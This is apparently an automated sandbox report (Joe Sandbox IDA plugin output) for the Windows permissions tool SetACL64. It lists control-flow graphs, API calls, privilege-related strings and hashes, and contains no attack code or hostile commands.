2816 7ff7c173e9a4-7ff7c173e9b7 2808->2816 2810->2802 2815->2754 2816->2783 2816->2815 2824 7ff7c173ea9d-7ff7c173eaa2 call 7ff7c17421a0 2821->2824 2825 7ff7c173ea84-7ff7c173ea97 2821->2825 2824->2773 2825->2764 2825->2824 2830->2787
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
                                                  • String ID: computername
                                                  • API String ID: 1703289946-1800712684
                                                  • Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                                  • Instruction ID: 8326e1b8e59295722186241ef7f704be1e1d5316c92c87dbfd19babd664f2942
                                                  • Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                                  • Instruction Fuzzy Hash: E522C062B14B5285FB00AF6AD8443AD6371BB487A8FC05635DF5D17ADADFB8E481C320

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2831 7ff7c1723d1b-7ff7c1723d4b AdjustTokenPrivileges 2832 7ff7c1723d4d-7ff7c1723d55 GetLastError 2831->2832 2833 7ff7c1723d66-7ff7c1723d79 GetLastError CloseHandle 2831->2833 2832->2833 2834 7ff7c1723d57-7ff7c1723d64 CloseHandle 2832->2834 2835 7ff7c1723d7a-7ff7c1723d83 2833->2835 2834->2835 2836 7ff7c1723dbc-7ff7c1723dd8 2835->2836 2837 7ff7c1723d85-7ff7c1723d9c 2835->2837 2840 7ff7c1723dda-7ff7c1723df1 2836->2840 2841 7ff7c1723e11-7ff7c1723e13 2836->2841 2838 7ff7c1723db7 call 7ff7c17421a0 2837->2838 2839 7ff7c1723d9e-7ff7c1723db1 2837->2839 2838->2836 2839->2838 2842 7ff7c172440d-7ff7c1724412 call 7ff7c17488fc 2839->2842 2844 7ff7c1723e0c call 7ff7c17421a0 2840->2844 2845 7ff7c1723df3-7ff7c1723e06 2840->2845 2846 7ff7c1723e19-7ff7c1723e9f call 7ff7c1713f80 * 2 call 7ff7c171d260 2841->2846 2847 7ff7c1723f1b-7ff7c1724040 call 7ff7c1713f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2841->2847 2849 7ff7c1724413-7ff7c1724418 call 7ff7c17488fc 2842->2849 2844->2841 2845->2844 2845->2849 2869 7ff7c1723ed9-7ff7c1723ee2 2846->2869 2870 7ff7c1723ea1-7ff7c1723eb8 2846->2870 2871 7ff7c1724079-7ff7c1724095 2847->2871 2872 7ff7c1724042-7ff7c1724059 2847->2872 2862 7ff7c1724419-7ff7c172441e call 7ff7c17488fc 2849->2862 2873 7ff7c172441f-7ff7c1724424 call 7ff7c17488fc 2862->2873 2869->2847 2878 7ff7c1723ee4-7ff7c1723efb 2869->2878 2874 7ff7c1723eba-7ff7c1723ecd 2870->2874 2875 7ff7c1723ed3-7ff7c1723ed8 call 7ff7c17421a0 2870->2875 2879 7ff7c1724097-7ff7c17240ae 2871->2879 2880 7ff7c17240ce-7ff7c17240d0 2871->2880 2876 7ff7c172405b-7ff7c172406e 2872->2876 2877 7ff7c1724074 call 7ff7c17421a0 2872->2877 2895 7ff7c1724425-7ff7c172442a call 7ff7c17488fc 2873->2895 2874->2862 2874->2875 2875->2869 2876->2873 2876->2877 2877->2871 2884 7ff7c1723efd-7ff7c1723f10 2878->2884 2885 7ff7c1723f16 call 7ff7c17421a0 2878->2885 2886 7ff7c17240c9 call 7ff7c17421a0 2879->2886 2887 7ff7c17240b0-7ff7c17240c3 2879->2887 
2888 7ff7c17241d8-7ff7c1724209 2880->2888 2889 7ff7c17240d6-7ff7c172415c call 7ff7c1713f80 * 2 call 7ff7c171d260 2880->2889 2884->2885 2894 7ff7c17243dd-7ff7c172440c call 7ff7c17488fc * 8 2884->2894 2885->2847 2886->2880 2887->2886 2887->2895 2891 7ff7c1724268-7ff7c1724294 2888->2891 2892 7ff7c172420b-7ff7c172420e 2888->2892 2940 7ff7c172415e-7ff7c1724175 2889->2940 2941 7ff7c1724196-7ff7c172419f 2889->2941 2903 7ff7c1724314-7ff7c1724320 2891->2903 2904 7ff7c1724296-7ff7c1724299 2891->2904 2901 7ff7c1724210-7ff7c1724220 2892->2901 2894->2842 2913 7ff7c172442b-7ff7c1724430 call 7ff7c17488fc 2895->2913 2907 7ff7c1724239-7ff7c1724266 2901->2907 2908 7ff7c1724222-7ff7c1724233 call 7ff7c173e4b0 2901->2908 2909 7ff7c1724322-7ff7c172432c call 7ff7c173e4b0 2903->2909 2910 7ff7c1724335-7ff7c1724341 2903->2910 2912 7ff7c17242a0-7ff7c17242b4 2904->2912 2907->2891 2907->2901 2908->2907 2934 7ff7c1724356-7ff7c172435b 2908->2934 2925 7ff7c1724331-7ff7c1724333 2909->2925 2917 7ff7c172435d-7ff7c1724367 call 7ff7c1724810 2910->2917 2918 7ff7c1724343-7ff7c1724354 call 7ff7c173e4b0 2910->2918 2920 7ff7c17242cd-7ff7c17242d2 2912->2920 2921 7ff7c17242b6-7ff7c17242c7 call 7ff7c173e4b0 2912->2921 2942 7ff7c17243b1-7ff7c17243dc call 7ff7c1742180 2917->2942 2944 7ff7c1724369-7ff7c1724372 2917->2944 2918->2917 2918->2934 2930 7ff7c17242ea-7ff7c1724312 2920->2930 2931 7ff7c17242d4-7ff7c17242e8 call 7ff7c173e4b0 2920->2931 2921->2920 2921->2934 2925->2910 2925->2934 2930->2903 2930->2912 2931->2930 2931->2934 2934->2942 2947 7ff7c1724177-7ff7c172418a 2940->2947 2948 7ff7c1724190-7ff7c1724195 call 7ff7c17421a0 2940->2948 2941->2888 2949 7ff7c17241a1-7ff7c17241b8 2941->2949 2950 7ff7c172439e-7ff7c17243a1 2944->2950 2951 7ff7c1724374-7ff7c1724396 call 7ff7c172a350 2944->2951 2947->2913 2947->2948 2948->2941 2958 7ff7c17241ba-7ff7c17241cd 2949->2958 2959 7ff7c17241d3 call 7ff7c17421a0 2949->2959 2955 7ff7c17243af 2950->2955 2956 7ff7c17243a3-7ff7c17243aa call 7ff7c173b2b0 2950->2956 2951->2942 
2966 7ff7c1724398 2951->2966 2955->2942 2956->2955 2958->2894 2958->2959 2959->2888 2966->2950
                                                  APIs
                                                  Strings
                                                  • SeTakeOwnershipPrivilege, xrefs: 00007FF7C1723F39
                                                  • Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF7C1723E37
                                                  • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF7C17240F4
                                                  • Prepare, xrefs: 00007FF7C1723E67, 00007FF7C1724124
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                  • String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
                                                  • API String ID: 637398405-1701055250
                                                  • Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                                  • Instruction ID: c77cc8134237ee559abf351430eb185c8b09e6fc28fb277a0563e36015b18200
                                                  • Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                                  • Instruction Fuzzy Hash: 30E1A5B2B1874281EB04DF56E044369A361FB897F4F905135EA9E43AEADFBCE095C710

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3047 7ff7c171d304-7ff7c171d30a 3048 7ff7c171d310-7ff7c171d318 3047->3048 3049 7ff7c171d65f-7ff7c171d668 LeaveCriticalSection 3047->3049 3050 7ff7c171d31a-7ff7c171d320 3048->3050 3051 7ff7c171d326-7ff7c171d32e 3048->3051 3052 7ff7c171d669-7ff7c171d66d 3049->3052 3050->3049 3050->3051 3053 7ff7c171d35b-7ff7c171d35d 3051->3053 3054 7ff7c171d330-7ff7c171d355 GetSystemTimeAsFileTime 3051->3054 3055 7ff7c171d66f-7ff7c171d685 3052->3055 3056 7ff7c171d6a6-7ff7c171d6aa 3052->3056 3059 7ff7c171d36f-7ff7c171d371 3053->3059 3060 7ff7c171d35f-7ff7c171d369 GetCurrentThreadId 3053->3060 3054->3053 3061 7ff7c171d687-7ff7c171d69a 3055->3061 3062 7ff7c171d6a0-7ff7c171d6a5 call 7ff7c17421a0 3055->3062 3057 7ff7c171d6ac-7ff7c171d6c2 3056->3057 3058 7ff7c171d6df-7ff7c171d6e7 3056->3058 3063 7ff7c171d6d9-7ff7c171d6de call 7ff7c17421a0 3057->3063 3064 7ff7c171d6c4-7ff7c171d6d7 3057->3064 3065 7ff7c171d6e9-7ff7c171d6ff 3058->3065 3066 7ff7c171d71b-7ff7c171d741 call 7ff7c1742180 3058->3066 3067 7ff7c171d527-7ff7c171d5b0 LeaveCriticalSection call 7ff7c17421d4 3059->3067 3068 7ff7c171d377-7ff7c171d3a4 GetUserNameExW 3059->3068 3060->3059 3061->3062 3069 7ff7c171d74e-7ff7c171d753 call 7ff7c17488fc 3061->3069 3062->3056 3063->3058 3064->3063 3072 7ff7c171d754-7ff7c171d759 call 7ff7c17488fc 3064->3072 3075 7ff7c171d701-7ff7c171d714 3065->3075 3076 7ff7c171d716 call 7ff7c17421a0 3065->3076 3090 7ff7c171d5cc-7ff7c171d5e9 3067->3090 3091 7ff7c171d5b2-7ff7c171d5bb 3067->3091 3078 7ff7c171d3b9-7ff7c171d3e4 call 7ff7c1715790 GetUserNameExW 3068->3078 3079 7ff7c171d3a6-7ff7c171d3b3 GetLastError 3068->3079 3069->3072 3075->3076 3076->3066 3094 7ff7c171d3f0-7ff7c171d3f7 3078->3094 3095 7ff7c171d3e6-7ff7c171d3ee GetLastError 3078->3095 3079->3078 3087 7ff7c171d45a-7ff7c171d45c 3079->3087 3087->3067 3093 7ff7c171d462-7ff7c171d4c9 call 7ff7c1710520 call 7ff7c170a740 3087->3093 3098 7ff7c171d5eb-7ff7c171d600 call 7ff7c1713f80 3090->3098 
3099 7ff7c171d605-7ff7c171d60c 3090->3099 3096 7ff7c171d5bd 3091->3096 3097 7ff7c171d5c1-7ff7c171d5c7 call 7ff7c1713f80 3091->3097 3122 7ff7c171d51c-7ff7c171d526 call 7ff7c1709720 3093->3122 3123 7ff7c171d4cb-7ff7c171d4d2 3093->3123 3102 7ff7c171d400-7ff7c171d409 3094->3102 3101 7ff7c171d41a-7ff7c171d41d 3095->3101 3096->3097 3097->3090 3098->3099 3105 7ff7c171d62b-7ff7c171d62e 3099->3105 3106 7ff7c171d60e-7ff7c171d627 call 7ff7c1713f80 3099->3106 3101->3087 3112 7ff7c171d41f-7ff7c171d437 3101->3112 3102->3102 3111 7ff7c171d40b-7ff7c171d417 call 7ff7c1713f80 3102->3111 3108 7ff7c171d64a-7ff7c171d65d call 7ff7c171ea60 3105->3108 3109 7ff7c171d630-7ff7c171d639 3105->3109 3106->3105 3108->3052 3114 7ff7c171d63b 3109->3114 3115 7ff7c171d63e-7ff7c171d649 call 7ff7c1713f80 3109->3115 3111->3101 3119 7ff7c171d439-7ff7c171d44c 3112->3119 3120 7ff7c171d452-7ff7c171d455 call 7ff7c17421a0 3112->3120 3114->3115 3115->3108 3119->3120 3127 7ff7c171d748-7ff7c171d74d call 7ff7c17488fc 3119->3127 3120->3087 3122->3067 3129 7ff7c171d4f7-7ff7c171d502 3123->3129 3130 7ff7c171d4d4-7ff7c171d4dd 3123->3130 3127->3069 3129->3122 3137 7ff7c171d504-7ff7c171d50d 3129->3137 3135 7ff7c171d4df 3130->3135 3136 7ff7c171d4e2-7ff7c171d4f2 call 7ff7c1713f80 3130->3136 3135->3136 3136->3129 3140 7ff7c171d50f 3137->3140 3141 7ff7c171d512-7ff7c171d51b call 7ff7c1713f80 3137->3141 3140->3141 3141->3122
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
                                                  • String ID:
                                                  • API String ID: 3424761043-0
                                                  • Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                                  • Instruction ID: f33a3d762309f7401753515b5881d6949de4979e9e9b18c20200d0c3aa29824e
                                                  • Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                                  • Instruction Fuzzy Hash: 4CC1B032B14A4286EB00EF66D4482ACB371FB497A8FA14631DE5C5779ADFBCE444C760

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3213 7ff7c1723fd8-7ff7c1724008 AdjustTokenPrivileges 3214 7ff7c172400a-7ff7c1724012 GetLastError 3213->3214 3215 7ff7c1724023-7ff7c1724036 GetLastError CloseHandle 3213->3215 3214->3215 3216 7ff7c1724014-7ff7c1724021 CloseHandle 3214->3216 3217 7ff7c1724037-7ff7c1724040 3215->3217 3216->3217 3218 7ff7c1724079-7ff7c1724095 3217->3218 3219 7ff7c1724042-7ff7c1724059 3217->3219 3222 7ff7c1724097-7ff7c17240ae 3218->3222 3223 7ff7c17240ce-7ff7c17240d0 3218->3223 3220 7ff7c172405b-7ff7c172406e 3219->3220 3221 7ff7c1724074 call 7ff7c17421a0 3219->3221 3220->3221 3224 7ff7c172441f-7ff7c1724424 call 7ff7c17488fc 3220->3224 3221->3218 3226 7ff7c17240c9 call 7ff7c17421a0 3222->3226 3227 7ff7c17240b0-7ff7c17240c3 3222->3227 3228 7ff7c17241d8-7ff7c1724209 3223->3228 3229 7ff7c17240d6-7ff7c172415c call 7ff7c1713f80 * 2 call 7ff7c171d260 3223->3229 3232 7ff7c1724425-7ff7c172442a call 7ff7c17488fc 3224->3232 3226->3223 3227->3226 3227->3232 3230 7ff7c1724268-7ff7c1724294 3228->3230 3231 7ff7c172420b-7ff7c172420e 3228->3231 3273 7ff7c172415e-7ff7c1724175 3229->3273 3274 7ff7c1724196-7ff7c172419f 3229->3274 3239 7ff7c1724314-7ff7c1724320 3230->3239 3240 7ff7c1724296-7ff7c1724299 3230->3240 3238 7ff7c1724210-7ff7c1724220 3231->3238 3249 7ff7c172442b-7ff7c1724430 call 7ff7c17488fc 3232->3249 3244 7ff7c1724239-7ff7c1724266 3238->3244 3245 7ff7c1724222-7ff7c1724233 call 7ff7c173e4b0 3238->3245 3246 7ff7c1724322-7ff7c172432c call 7ff7c173e4b0 3239->3246 3247 7ff7c1724335-7ff7c1724341 3239->3247 3248 7ff7c17242a0-7ff7c17242b4 3240->3248 3244->3230 3244->3238 3245->3244 3268 7ff7c1724356-7ff7c172435b 3245->3268 3260 7ff7c1724331-7ff7c1724333 3246->3260 3253 7ff7c172435d-7ff7c1724367 call 7ff7c1724810 3247->3253 3254 7ff7c1724343-7ff7c1724354 call 7ff7c173e4b0 3247->3254 3255 7ff7c17242cd-7ff7c17242d2 3248->3255 3256 7ff7c17242b6-7ff7c17242c7 call 7ff7c173e4b0 3248->3256 3275 7ff7c17243b1-7ff7c17243dc call 7ff7c1742180 
3253->3275 3276 7ff7c1724369-7ff7c1724372 3253->3276 3254->3253 3254->3268 3264 7ff7c17242ea-7ff7c1724312 3255->3264 3265 7ff7c17242d4-7ff7c17242e8 call 7ff7c173e4b0 3255->3265 3256->3255 3256->3268 3260->3247 3260->3268 3264->3239 3264->3248 3265->3264 3265->3268 3268->3275 3278 7ff7c1724177-7ff7c172418a 3273->3278 3279 7ff7c1724190-7ff7c1724195 call 7ff7c17421a0 3273->3279 3274->3228 3280 7ff7c17241a1-7ff7c17241b8 3274->3280 3281 7ff7c172439e-7ff7c17243a1 3276->3281 3282 7ff7c1724374-7ff7c1724396 call 7ff7c172a350 3276->3282 3278->3249 3278->3279 3279->3274 3288 7ff7c17241ba-7ff7c17241cd 3280->3288 3289 7ff7c17241d3 call 7ff7c17421a0 3280->3289 3285 7ff7c17243af 3281->3285 3286 7ff7c17243a3-7ff7c17243aa call 7ff7c173b2b0 3281->3286 3282->3275 3296 7ff7c1724398 3282->3296 3285->3275 3286->3285 3288->3289 3294 7ff7c17243dd-7ff7c172441e call 7ff7c17488fc * 11 3288->3294 3289->3228 3294->3224 3296->3281
                                                  APIs
                                                  Strings
                                                  • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF7C17240F4
                                                  • Prepare, xrefs: 00007FF7C1724124
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast$AdjustPrivilegesToken
                                                  • String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
                                                  • API String ID: 1992325626-2245062721
                                                  • Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                                  • Instruction ID: e34f28846aa2088b9c98576b79db7238deead4a202d10370752c75767d7b71f6
                                                  • Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                                  • Instruction Fuzzy Hash: 1AA1B2B2B1864282EF14DF56E0443A9A361FB89BF4F805135EA5E476D6DFBCE091C710

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3407 7ff7c1756c40-7ff7c1756c9c call 7ff7c1753e64 3410 7ff7c1756c9e-7ff7c1756cb2 call 7ff7c1756ba4 3407->3410 3411 7ff7c1756cb5-7ff7c1756cbc 3407->3411 3410->3411 3413 7ff7c1756d0b call 7ff7c175648c 3411->3413 3414 7ff7c1756cbe-7ff7c1756cc5 3411->3414 3420 7ff7c1756d10-7ff7c1756d14 3413->3420 3416 7ff7c1756cce call 7ff7c1756604 3414->3416 3417 7ff7c1756cc7-7ff7c1756ccc call 7ff7c1756534 3414->3417 3425 7ff7c1756cd3-7ff7c1756cd7 3416->3425 3417->3425 3423 7ff7c1756e6d 3420->3423 3424 7ff7c1756d1a-7ff7c1756d25 3420->3424 3426 7ff7c1756e6f-7ff7c1756e8d 3423->3426 3427 7ff7c1756d27-7ff7c1756d2b 3424->3427 3428 7ff7c1756d35-7ff7c1756d38 call 7ff7c1756a74 3424->3428 3425->3424 3429 7ff7c1756cd9-7ff7c1756cef call 7ff7c1756ba4 3425->3429 3427->3428 3430 7ff7c1756d2d-7ff7c1756d33 GetACP 3427->3430 3433 7ff7c1756d3d-7ff7c1756d41 3428->3433 3429->3420 3436 7ff7c1756cf1-7ff7c1756cfb 3429->3436 3430->3433 3433->3423 3435 7ff7c1756d47-7ff7c1756d4c 3433->3435 3435->3423 3437 7ff7c1756d52-7ff7c1756d5d IsValidCodePage 3435->3437 3438 7ff7c1756cfd-7ff7c1756d02 call 7ff7c1756534 3436->3438 3439 7ff7c1756d04-7ff7c1756d09 call 7ff7c1756604 3436->3439 3437->3423 3440 7ff7c1756d63-7ff7c1756d66 3437->3440 3438->3420 3439->3420 3443 7ff7c1756d6b-7ff7c1756d6e 3440->3443 3444 7ff7c1756d68 3440->3444 3447 7ff7c1756d74-7ff7c1756d7f 3443->3447 3448 7ff7c1756e66-7ff7c1756e6b 3443->3448 3444->3443 3449 7ff7c1756d83-7ff7c1756d8b 3447->3449 3448->3426 3449->3449 3450 7ff7c1756d8d-7ff7c1756da2 call 7ff7c17552dc 3449->3450 3453 7ff7c1756e8e-7ff7c1756f1b call 7ff7c174892c call 7ff7c1753e64 * 2 call 7ff7c1757448 GetLocaleInfoW 3450->3453 3454 7ff7c1756da8-7ff7c1756dbe call 7ff7c1757eb0 3450->3454 3473 7ff7c1756f1d-7ff7c1756f22 3453->3473 3474 7ff7c1756f24-7ff7c1756f37 call 7ff7c175c558 3453->3474 3454->3423 3460 7ff7c1756dc4-7ff7c1756de3 call 7ff7c1757eb0 3454->3460 3460->3423 3466 7ff7c1756de9-7ff7c1756df9 call 7ff7c17631a0 3460->3466 
3471 7ff7c1756e0b-7ff7c1756e22 call 7ff7c1757eb0 3466->3471 3472 7ff7c1756dfb-7ff7c1756e09 call 7ff7c17631a0 3466->3472 3471->3423 3483 7ff7c1756e24-7ff7c1756e31 3471->3483 3472->3471 3472->3483 3477 7ff7c1756f63-7ff7c1756f8b call 7ff7c1742180 3473->3477 3485 7ff7c1756f59-7ff7c1756f60 3474->3485 3486 7ff7c1756f39 3474->3486 3487 7ff7c1756e33-7ff7c1756e4e call 7ff7c17552dc 3483->3487 3488 7ff7c1756e52-7ff7c1756e61 call 7ff7c175da08 3483->3488 3485->3477 3489 7ff7c1756f40-7ff7c1756f43 3486->3489 3487->3453 3495 7ff7c1756e50 3487->3495 3488->3448 3489->3485 3490 7ff7c1756f45-7ff7c1756f4e 3489->3490 3490->3489 3493 7ff7c1756f50-7ff7c1756f56 3490->3493 3493->3485 3495->3448
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastNameTranslate$CodePageValid
                                                  • String ID: utf8
                                                  • API String ID: 2136749100-905460609
                                                  • Opcode ID: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                                  • Instruction ID: c03797136905016451a3b6d16ef0eeb9f7aabe5708e430a1565069f1577d95ca
                                                  • Opcode Fuzzy Hash: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                                  • Instruction Fuzzy Hash: 5A917631A09B8285EB24BF22D4202B9A355FB4CBA0FD44531EA4D47697DFBCE552C760
                                                  Similarity
                                                  • API ID: Create$Event$Mutex
                                                  • String ID:
                                                  • API String ID: 646228171-0
                                                  • Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                                  • Instruction ID: d077b1f059a800f278c57c93bcb1e23eb1d14d1b685fca0b9b5a26e9cf1b7f7c
                                                  • Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                                  • Instruction Fuzzy Hash: DF016171E18B5282F314EF3BAC46725B291BF5E330F904635D44919D62DFFD20844720
                                                  Similarity
                                                  • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3827717455-0
                                                  • Opcode ID: cd5847d95c1ec1ea5f6fa8942c7cd11692604adcea6c09be9589e5be80c42005
                                                  • Instruction ID: 8d9ff90edd2942f029254b67a56d3c5474e1654188ce974758c3abdfac0f02b9
                                                  • Opcode Fuzzy Hash: cd5847d95c1ec1ea5f6fa8942c7cd11692604adcea6c09be9589e5be80c42005
                                                  • Instruction Fuzzy Hash: A5C1E726A0868285FB60EF6394107FAA7A4FB8C7A8FD04035DE4D87686DFBCD505CB14
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f9f6a45bebd045a65918cd93e0d102e00439adfc5451531a9305081acf388ad
                                                  • Instruction ID: f99fac776142e25a4dde6464d0f10b56f0a3f354fd14f93dec3a74fad563b947
                                                  • Opcode Fuzzy Hash: 5f9f6a45bebd045a65918cd93e0d102e00439adfc5451531a9305081acf388ad
                                                  • Instruction Fuzzy Hash: 1651F717A1820282EB68BE2B81006BDA790EF4C764FC45136DD4D4728BCFADE905CF71
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 485612231-0
                                                  • Opcode ID: 8d8ad80b19cf41d7d45d56f594be254ad60926e3090e2f9cb78a876611dcab70
                                                  • Instruction ID: 2066d8977589be2f1bef1f2cc833cca2a80a87616278723302bb71f8bbb6634e
                                                  • Opcode Fuzzy Hash: 8d8ad80b19cf41d7d45d56f594be254ad60926e3090e2f9cb78a876611dcab70
                                                  • Instruction Fuzzy Hash: 5641D322714A5882EF44DF6BD9241A9A391BB4CFE4B99A432DE4D97B59DF7CD0428300

                                                  Control-flow Graph
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
                                                  • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                                                  • API String ID: 6815931-1541018277
                                                  • Opcode ID: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                                  • Instruction ID: 24a0aa6039bf43965c28a0ae0a05a4ee6045b92417294ad788885dfbbc1ad43d
                                                  • Opcode Fuzzy Hash: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                                  • Instruction Fuzzy Hash: B0228572A1878281EB04AF5AE44436DE361FB897B4FD05135E69D43AEADFBCE091C710

                                                  Control-flow Graph
                                                  APIs
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C17234DB
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C17234E1
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C17234E7
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1723503
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C1723509
